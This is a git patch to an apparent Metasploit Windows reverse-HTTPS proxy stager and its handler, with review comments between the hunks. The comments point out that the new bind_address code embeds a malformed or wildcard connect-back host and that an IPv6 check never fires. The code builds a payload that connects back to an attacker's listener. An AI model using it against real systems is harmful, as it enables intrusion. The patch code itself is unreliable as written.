From 063da8a22e3db80dcef42168abe868e9aea102d1 Mon Sep 17 00:00:00 2001
From: OJ
Date: Mon, 11 Nov 2013 22:21:05 +1000
Subject: [PATCH] Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was ommitted in the orginal commits. This now uses the same mechanism as the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
---
 lib/msf/core/handler/reverse_https_proxy.rb | 8 +++-
 .../stagers/windows/reverse_https_proxy.rb | 40 ++++++++++++++-----
 2 files changed, 36 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb
index 10ec427f6b..1cc216f6d6 100644
--- a/lib/msf/core/handler/reverse_https_proxy.rb
+++ b/lib/msf/core/handler/reverse_https_proxy.rb
@@ -42,13 +42,17 @@ module ReverseHttpsProxy
         OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
         OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
         OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
-        OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
-        OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
         OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
         OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
         OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
       ], Msf::Handler::ReverseHttpsProxy)
+    register_advanced_options(
+      [
+        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
+      ], Msf::Handler::ReverseHttpsProxy)
+
   end
 end
diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb
index fe83475b03..3794ce3d9e 100644
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -134,11 +134,7 @@ module Metasploit3
     p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
     # patch the LPORT
-    unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
-      lport = datastore['HIDDENPORT']
-    else
-      lport = datastore['LPORT']
-    end
+    lport = bind_port
     lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444
     p[lportloc+1] = [lport.to_i].pack('V')[0]
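Review bot: The descriptions of the two new advanced options, 'The specific IP address to bind to on the local system' and 'The port to bind to on the local system if different from LPORT', describe a local listener binding only, but the stager hunks of modules/payloads/stagers/windows/reverse_https_proxy.rb in this same commit write `bind_address` and `bind_port` into the generated payload, so the same values also become the connect-back host and port. Whichever semantics is intended, the option text should state it, e.g. append ` (also embedded in the generated stager as the connect-back address)` to the `ReverseListenerBindAddress` description and the equivalent for the port. The commit message calls the port option `ReverseListenerBindHost`, which does not match the registered name `ReverseListenerBindPort`; the message should be corrected before merge so the option can be found by name.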
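Review bot: `lport = bind_port` patches `ReverseListenerBindPort` into the stager whenever it is set, because `bind_port` (added in the @@ -163 hunk of this file) returns it in preference to LPORT. The handler hunk describes that option as the port to bind "if different from LPORT", which reads as a listener sitting behind a forward where clients still reach LPORT; under that reading the value patched here should remain `lport = datastore['LPORT']` and only the listener's bind should consult `bind_port`. If the bind port is deliberately the connect-back port for this proxied stager, a comment such as `# connect-back port: ReverseListenerBindPort deliberately overrides LPORT here` would stop the next reader from reverting it. The enclosing method starts before this hunk.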
@@ -148,11 +144,7 @@ module Metasploit3
     # append LHOST and return payload
-    unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
-      lhost = datastore['HIDDENHOST']
-    else
-      lhost = datastore['LHOST']
-    end
+    lhost = bind_address
     p + lhost.to_s + "\x00"
   end
@@ -163,5 +155,33 @@ module Metasploit3
   def wfs_delay
     20
   end
+
+protected
+
+  def bind_port
+    port = datastore['ReverseListenerBindPort'].to_i
+    port > 0 ? port : datastore['LPORT'].to_i
+  end
+
+  def bind_address
+    # Switch to IPv6 ANY address if the LHOST is also IPv6
+    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+    # First attempt to bind LHOST. If that fails, the user probably has
+    # something else listening on that interface. Try again with ANY_ADDR.
+    any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+    addrs = [ Rex::Socket.addr_ntoa(addr), any ]
+
+    if not datastore['ReverseListenerBindAddress'].to_s.empty?
+      # Only try to bind to this specific interface
+      addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+      # Pick the right "any" address if either wildcard is used
+      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+    end
+
+    addrs
+  end
+
 end
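Review bot: `lhost = bind_address` followed by `p + lhost.to_s + "\x00"` appends the string form of an Array rather than a host: `bind_address` (added in the @@ -163 hunk below) returns `addrs`, a list of one or two strings, and on Ruby 1.9+ `Array#to_s` is the inspect form, e.g. `["10.0.0.1", "0.0.0.0"]` (constructed example), so the generated stager carries an unusable host string on every run of this path. At minimum this should read `lhost = bind_address.first`, and the same return-type issue applies to the `bind_address` definition in the @@ -163 hunk. Even with `.first`, the wildcard substitution inside `bind_address` can place "0.0.0.0" or "::0" into the payload, which is not a usable connect-back address, whereas the replaced `datastore['LHOST']` fallback could not produce that; the wildcard handling belongs to the listener, not to stager generation. The enclosing method starts before this hunk.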
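Review bot: In `bind_address` the condition `(addrs[0] == "0.0.0.0" or addrs == "::0")` compares the whole Array `addrs` with a String, which is always false, so the IPv6 wildcard branch never fires; it should be `addrs[0] = any if addrs[0] == "0.0.0.0" || addrs[0] == "::0"`. The comments "First attempt to bind LHOST. If that fails ... Try again with ANY_ADDR." and "Only try to bind to this specific interface" describe a listener's bind-retry loop, but this method sits in the stager module and its result is spliced into the payload by the @@ -148 hunk, so they should be rewritten to describe what the returned list means for stager generation, or the method should return a single address. As a point of style, `if not datastore['ReverseListenerBindAddress'].to_s.empty?` reads better as `unless datastore['ReverseListenerBindAddress'].to_s.empty?`, `or` should be `||` to avoid precedence surprises, and the bare `protected` at column 0 would be indented to the module body like the methods beneath it.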